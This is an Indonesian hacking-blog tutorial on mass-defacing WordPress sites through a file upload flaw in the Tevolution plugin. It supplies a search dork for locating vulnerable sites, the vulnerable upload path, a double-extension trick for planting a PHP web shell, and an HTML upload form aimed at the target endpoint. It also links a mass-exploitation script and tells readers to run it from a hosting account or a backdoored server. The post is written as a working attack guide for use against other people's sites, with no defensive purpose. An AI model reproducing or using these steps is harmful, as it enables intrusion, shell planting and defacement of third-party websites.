Home CMS Wordpress Deface Dunia Komputer Hacking Keamanan Website Security Tester Tutorial Tutorial Deface WordPress Plugins Tevolution dengan Mass Xploiter

Monday 9 May 2016

Tutorial Deface WordPress Plugins Tevolution dengan Mass Xploiter

Hello World ; Malam Fans, Please Say Hello Haters :*
xixixhi, Nuenomaru disini, Sekarang Nue akan Share Tutorial Deface WordPress Plugins Tevolution dengan Mass Xploiter tool buatan IndoXploit *exploitnya lagi booming nih dikalangan dispenser :3 *yang dah expert minggir dlu beb ;*
Exploit ini adalah salah satu bug/celah yg terdapat pada plugins CMS WordPress.
Langsung Intip tutorialnya ;*
Dork:
inurl:"/wp-content/plugins/Tevolution/"
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)


 1. Dorking di search Engine

 2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.
exploit: /[path]/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

 3. Vulnerability ~ Blank
kurang lebih sih gitu~ akwkwa :v

 Kumpulin dulu semua target yang vuln, kalo dah banyak waktunya proses auto tanem shell menggunakan Mass Xploiter buatan tim IndoXploit..
disini gua dh tanem toolnya di web org.
Klik disitu -> Dont touch Me Senpai :')

Shell name: nuenomaru bisa di ganti dgn sesukalu.php.xxxjpg
*pada exploit ini kita manfaatkan bypass ekstensi shell..

 pada kolom Target, pastekan target2 yg pgn ente tusb0l.
Lalu Klik Hajar! , makan akan secara otomatis akan muncul letak shell ente..
lalu klik deh :


file/shell akses: /wp-content/uploads/thn/bln/namashell.php.xxxjpg

 disini script Mass Auto xploiter Plugins Tevolution -> http://pastebin.com/9SCkGP3h

 cara pake? :
- masukin ke hosting/shell backdoor
- buka filenyaaa
- happy deface ^_^

 CSRF:

 <form
action="target.coli/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>

Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih


source and Big thanks to: blog indoXploit

./Nuenomaru



tidak perlu muncul ke permukaan , yang penting tetap bergerilya










Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Tutorial Deface WordPress Plugins Tevolution dengan Mass Xploiter Tutorial Deface WordPress Plugins Tevolution dengan Mass Xploiter Ketikan Nue 5.0 stars based on 35 reviews Hello World ; Malam Fans, Please Say Hello Haters :* xixixhi, Nuenomaru disini,  Sekarang Nue akan Share  Tutorial Deface WordPress Plugi...
Share this with short URL Get Short URLloading short url

Related Posts

Next Post
Previous Post

2 comments

avatar
Balas
MasterBlog TCA delete 25 December 2016 at 21:31

hehehe tolong laporkan disini ya: http://www.tkjcyberart.org/2016/05/broken-link-and-image-reporter.html

#Nuenomaru


EmoticonEmoticon

Subscribe to: Post Comments (Atom)